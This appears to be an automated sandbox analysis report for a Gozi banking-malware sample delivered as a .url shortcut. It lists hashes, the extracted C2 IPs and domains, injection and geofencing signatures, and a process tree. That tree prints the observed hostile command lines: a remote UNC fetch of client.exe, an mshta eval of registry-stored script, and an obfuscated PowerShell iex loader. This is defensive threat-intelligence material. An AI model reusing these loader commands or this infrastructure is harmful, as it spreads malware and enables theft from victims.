Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2023 18:30
Static task
static1
Behavioral task
behavioral1
Sample
cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad_JC.url
Resource
win7-20230831-en
General
-
Target
cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad_JC.url
-
Size
193B
-
MD5
b5553dcc74a1f928f6619cff575c0568
-
SHA1
74d15b6d882d64fc3d21bcc47f9a99685a6705c2
-
SHA256
cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad
-
SHA512
439ffa6b0612ba0753a94de5a82d04e7c9fdade17c18a7d204c34260566af162555800260971470af5c79de5b4a15c18609b08da609cff0a4608aff143f5a9d2
Malware Config
Extracted
gozi
Extracted
gozi
5050
185.247.184.139
62.72.33.155
incontroler.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
mifrutty.com
systemcheck.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2500 set thread context of 2852 2500 powershell.exe Explorer.EXE PID 2852 set thread context of 3752 2852 Explorer.EXE RuntimeBroker.exe PID 2852 set thread context of 3988 2852 Explorer.EXE RuntimeBroker.exe PID 2852 set thread context of 4744 2852 Explorer.EXE RuntimeBroker.exe PID 2852 set thread context of 1552 2852 Explorer.EXE RuntimeBroker.exe PID 2852 set thread context of 3112 2852 Explorer.EXE cmd.exe PID 2852 set thread context of 4992 2852 Explorer.EXE cmd.exe PID 3112 set thread context of 2124 3112 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4256 1456 WerFault.exe client.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2124 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
client.exepowershell.exeExplorer.EXEpid process 1456 client.exe 1456 client.exe 2500 powershell.exe 2500 powershell.exe 2500 powershell.exe 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 2500 powershell.exe 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 2852 Explorer.EXE 3112 cmd.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
svchost.exepowershell.exeExplorer.EXEdescription pid process Token: SeManageVolumePrivilege 3812 svchost.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeShutdownPrivilege 2852 Explorer.EXE Token: SeCreatePagefilePrivilege 2852 Explorer.EXE Token: SeShutdownPrivilege 2852 Explorer.EXE Token: SeCreatePagefilePrivilege 2852 Explorer.EXE Token: SeShutdownPrivilege 2852 Explorer.EXE Token: SeCreatePagefilePrivilege 2852 Explorer.EXE Token: SeShutdownPrivilege 2852 Explorer.EXE Token: SeCreatePagefilePrivilege 2852 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2852 Explorer.EXE -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 3700 wrote to memory of 1456 3700 rundll32.exe client.exe PID 3700 wrote to memory of 1456 3700 rundll32.exe client.exe PID 3700 wrote to memory of 1456 3700 rundll32.exe client.exe PID 2308 wrote to memory of 2500 2308 mshta.exe powershell.exe PID 2308 wrote to memory of 2500 2308 mshta.exe powershell.exe PID 2500 wrote to memory of 4628 2500 powershell.exe csc.exe PID 2500 wrote to memory of 4628 2500 powershell.exe csc.exe PID 4628 wrote to memory of 2596 4628 csc.exe cvtres.exe PID 4628 wrote to memory of 2596 4628 csc.exe cvtres.exe PID 2500 wrote to memory of 2064 2500 powershell.exe csc.exe PID 2500 wrote to memory of 2064 2500 powershell.exe csc.exe PID 2064 wrote to memory of 4256 2064 csc.exe cvtres.exe PID 2064 wrote to memory of 4256 2064 csc.exe cvtres.exe PID 2500 wrote to memory of 2852 2500 powershell.exe Explorer.EXE PID 2500 wrote to memory of 2852 2500 powershell.exe Explorer.EXE PID 2500 wrote to memory of 2852 2500 powershell.exe Explorer.EXE PID 2500 wrote to memory of 2852 2500 powershell.exe Explorer.EXE PID 2852 wrote to memory of 3752 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3752 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3752 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3752 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3988 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3988 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3988 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3988 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 4744 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 4744 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 4744 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 4744 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 1552 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 1552 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 3112 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 3112 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 3112 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 1552 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 1552 2852 Explorer.EXE RuntimeBroker.exe PID 2852 wrote to memory of 4992 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 4992 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 4992 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 4992 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 3112 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 3112 2852 Explorer.EXE cmd.exe PID 3112 wrote to memory of 2124 3112 cmd.exe PING.EXE PID 3112 wrote to memory of 2124 3112 cmd.exe PING.EXE PID 3112 wrote to memory of 2124 3112 cmd.exe PING.EXE PID 2852 wrote to memory of 4992 2852 Explorer.EXE cmd.exe PID 2852 wrote to memory of 4992 2852 Explorer.EXE cmd.exe PID 3112 wrote to memory of 2124 3112 cmd.exe PING.EXE PID 3112 wrote to memory of 2124 3112 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\cdfcfae61a588ac434b33e8836f7796c1512c2926a7439e6a92c32c4ff4fa4ad_JC.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
\??\UNC\62.173.138.114\scarica\client.exe"\\62.173.138.114\scarica\client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 4723⤵
- Program crash
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>B8io='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(B8io).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vujhempd -value gp; new-alias -name bckoyymx -value iex; bckoyymx ([System.Text.Encoding]::ASCII.GetString((vujhempd "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6018.tmp" "c:\Users\Admin\AppData\Local\Temp\u1n135mw\CSC1634BC13C5D4BA3AF2FC3CCC86693E.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60C4.tmp" "c:\Users\Admin\AppData\Local\Temp\cy4dqr2u\CSCE7AC4A548D2D4D9BB49F60E175CDAC0.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.138.114\scarica\client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1456 -ip 14561⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfmFilesize
16KB
MD5fc7c615b09ee7901b13d97f0f610a1f7
SHA18b975fee6b11ae67884fa698473adb214eb56353
SHA256ebd3b7f60a89187809584dd25e95d2fe26a4678de40e391a72649c04ddbfadee
SHA5129eff1f8ac9027aad5f820e7bef639fdb994c1aad84ea3dc3dc9911e51b256ccf95618fd1bb8a9a10ee4840145942e61de7ff9be218e672e6c4cbe91bef60e091
-
C:\Users\Admin\AppData\Local\Temp\RES6018.tmpFilesize
1KB
MD5a96a567169381ddd1cc2da5665f8b787
SHA1abe43536304576d1eec165acc5d34debbb2e89b9
SHA256af9563bf04fd1d3478714e844d17822f9251999dcbfb8b805258cd5174df6bb6
SHA512103743c22c53cb4fe4342d085ba17736df933a7839001b94f11c8262fac840966f605f0b48b55d60f22a46b2a36edf27956b932ad360c6c6693c3b8245faef18
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1duymb3b.f3r.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.dllFilesize
3KB
MD5d2f93fc78e300ad5cc62e32fd8b05e01
SHA135ad7358e312e1d36541440301e026cfc1f3e1a7
SHA2561288790cbd8d8a357719822f0a5215675885aac2bfa37299fb590136d252b2dd
SHA512d0df1fcf958cb7ff15ee59ac65f20718fc73d47c4c4bc45ce367ce6fd011db4279c91d7c7c460c995c32b9e864d2550bcebb811e5ee6612a0ac123ced9d1f01b
-
C:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.dllFilesize
3KB
MD5a89c014afe4691c09082698ffd1c9c53
SHA11902eba4caf44d66e8b347d8277bcdb7981ae88a
SHA2569379d9cfded2f1ab26f97bed0c6e48ef15fb736f1c1f64568d13df533d07ee9e
SHA512cccbcbf0c0dc72972fadd0ba29b5f4eca1d2ee27b3b5b8e185201149d79595d3774fc2eb90d31550a199a2d19ba9747b2c7705090d85b080bdc32651181061d8
-
\??\c:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\cy4dqr2u\cy4dqr2u.cmdlineFilesize
369B
MD58c865291da7138a9bcc5586c20710b9f
SHA15c9c1b381f7f20401ce34923e7c5f1148bc65aa0
SHA25687d939f2111ffb540de916e9039cedc92c8f23279e0f9097f82c91bf370579ac
SHA512403b037a86e130c94d6c4c2c9d2689684e88db707e353787ad59aba4b1b02d80159f52db73ba8e4df5410fabd12e02ad7378706df2256aab2a820d174ed3b683
-
\??\c:\Users\Admin\AppData\Local\Temp\u1n135mw\CSC1634BC13C5D4BA3AF2FC3CCC86693E.TMPFilesize
652B
MD58e0ab3301096f7be51ef165cc28bcd93
SHA1fc9591c00845461053416d3693564f9d007a66e6
SHA256c90dd0978b4a2a90775b5887dfd4f9a0e334372acaaa20a6bf92fc4dc770a6b5
SHA512724906f3ca05cdab973451ec34b54fd3bdd2b9456115d5413a6f79920ed0f8021a9631f18c8ba141f07c27fb5b9e61ef7b64521fc057998ca46faa21fcae2441
-
\??\c:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\u1n135mw\u1n135mw.cmdlineFilesize
369B
MD502a135a4d99fb00534008bda1467746e
SHA17bbfeb1e10d888f75ef3cf9da084b06554be14a7
SHA256319d3a8d4b02c90be16f5e8fef895f4664061a73f495942f5c8b9aeaf9d6785c
SHA512e772155d9dd51252d0c4659111bca7a4179ac394651f25e33147e74278efd84270cae7e16836c176a8d00dbf12d49d65d29c553fa4442f44ca3f369c4d4f685d
-
memory/1456-198-0x0000000000400000-0x000000000228F000-memory.dmpFilesize
30.6MB
-
memory/1456-9-0x0000000003FD0000-0x0000000003FDB000-memory.dmpFilesize
44KB
-
memory/1456-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmpFilesize
44KB
-
memory/1456-3-0x0000000000400000-0x000000000228F000-memory.dmpFilesize
30.6MB
-
memory/1456-4-0x0000000004030000-0x000000000403D000-memory.dmpFilesize
52KB
-
memory/1456-7-0x00000000024E0000-0x00000000025E0000-memory.dmpFilesize
1024KB
-
memory/1456-8-0x0000000000400000-0x000000000228F000-memory.dmpFilesize
30.6MB
-
memory/1456-1-0x00000000024E0000-0x00000000025E0000-memory.dmpFilesize
1024KB
-
memory/1552-199-0x000001B4E7F20000-0x000001B4E7FC4000-memory.dmpFilesize
656KB
-
memory/1552-172-0x000001B4E7F20000-0x000001B4E7FC4000-memory.dmpFilesize
656KB
-
memory/1552-173-0x000001B4E7FD0000-0x000001B4E7FD1000-memory.dmpFilesize
4KB
-
memory/2124-189-0x000002468D9D0000-0x000002468D9D1000-memory.dmpFilesize
4KB
-
memory/2124-200-0x000002468DC10000-0x000002468DCB4000-memory.dmpFilesize
656KB
-
memory/2124-191-0x000002468DC10000-0x000002468DCB4000-memory.dmpFilesize
656KB
-
memory/2500-143-0x00007FFFC9700000-0x00007FFFCA1C1000-memory.dmpFilesize
10.8MB
-
memory/2500-100-0x00000245EF8A0000-0x00000245EF8B0000-memory.dmpFilesize
64KB
-
memory/2500-129-0x00000245EFCC0000-0x00000245EFCFD000-memory.dmpFilesize
244KB
-
memory/2500-144-0x00000245EFCC0000-0x00000245EFCFD000-memory.dmpFilesize
244KB
-
memory/2500-127-0x00000245EFCB0000-0x00000245EFCB8000-memory.dmpFilesize
32KB
-
memory/2500-101-0x00000245EF8A0000-0x00000245EF8B0000-memory.dmpFilesize
64KB
-
memory/2500-114-0x00000245EF7F0000-0x00000245EF7F8000-memory.dmpFilesize
32KB
-
memory/2500-98-0x00000245EF800000-0x00000245EF822000-memory.dmpFilesize
136KB
-
memory/2500-99-0x00007FFFC9700000-0x00007FFFCA1C1000-memory.dmpFilesize
10.8MB
-
memory/2852-132-0x00000000009B0000-0x00000000009B1000-memory.dmpFilesize
4KB
-
memory/2852-196-0x000000000C280000-0x000000000C324000-memory.dmpFilesize
656KB
-
memory/2852-134-0x000000000C280000-0x000000000C324000-memory.dmpFilesize
656KB
-
memory/3112-201-0x0000018DFFC30000-0x0000018DFFCD4000-memory.dmpFilesize
656KB
-
memory/3112-177-0x0000018DFFCE0000-0x0000018DFFCE1000-memory.dmpFilesize
4KB
-
memory/3112-179-0x0000018DFFC30000-0x0000018DFFCD4000-memory.dmpFilesize
656KB
-
memory/3752-158-0x000001A7FF500000-0x000001A7FF5A4000-memory.dmpFilesize
656KB
-
memory/3752-147-0x000001A7FEEC0000-0x000001A7FEEC1000-memory.dmpFilesize
4KB
-
memory/3812-56-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-57-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-83-0x00000207A5FB0000-0x00000207A5FB1000-memory.dmpFilesize
4KB
-
memory/3812-82-0x00000207A5FB0000-0x00000207A5FB1000-memory.dmpFilesize
4KB
-
memory/3812-80-0x00000207A5FA0000-0x00000207A5FA1000-memory.dmpFilesize
4KB
-
memory/3812-68-0x00000207A5DA0000-0x00000207A5DA1000-memory.dmpFilesize
4KB
-
memory/3812-65-0x00000207A5E60000-0x00000207A5E61000-memory.dmpFilesize
4KB
-
memory/3812-62-0x00000207A5E70000-0x00000207A5E71000-memory.dmpFilesize
4KB
-
memory/3812-60-0x00000207A5E60000-0x00000207A5E61000-memory.dmpFilesize
4KB
-
memory/3812-59-0x00000207A5E70000-0x00000207A5E71000-memory.dmpFilesize
4KB
-
memory/3812-16-0x000002079DB40000-0x000002079DB50000-memory.dmpFilesize
64KB
-
memory/3812-32-0x000002079DC40000-0x000002079DC50000-memory.dmpFilesize
64KB
-
memory/3812-48-0x00000207A6220000-0x00000207A6221000-memory.dmpFilesize
4KB
-
memory/3812-58-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-49-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-84-0x00000207A60C0000-0x00000207A60C1000-memory.dmpFilesize
4KB
-
memory/3812-55-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-54-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-53-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-50-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-51-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3812-52-0x00000207A6250000-0x00000207A6251000-memory.dmpFilesize
4KB
-
memory/3988-164-0x000001886DF10000-0x000001886DFB4000-memory.dmpFilesize
656KB
-
memory/3988-160-0x000001886DCB0000-0x000001886DCB1000-memory.dmpFilesize
4KB
-
memory/4744-170-0x00000198D19F0000-0x00000198D1A94000-memory.dmpFilesize
656KB
-
memory/4744-167-0x00000198D1AA0000-0x00000198D1AA1000-memory.dmpFilesize
4KB
-
memory/4992-185-0x0000000001100000-0x0000000001198000-memory.dmpFilesize
608KB
-
memory/4992-194-0x0000000001100000-0x0000000001198000-memory.dmpFilesize
608KB
-
memory/4992-183-0x0000000000C40000-0x0000000000C41000-memory.dmpFilesize
4KB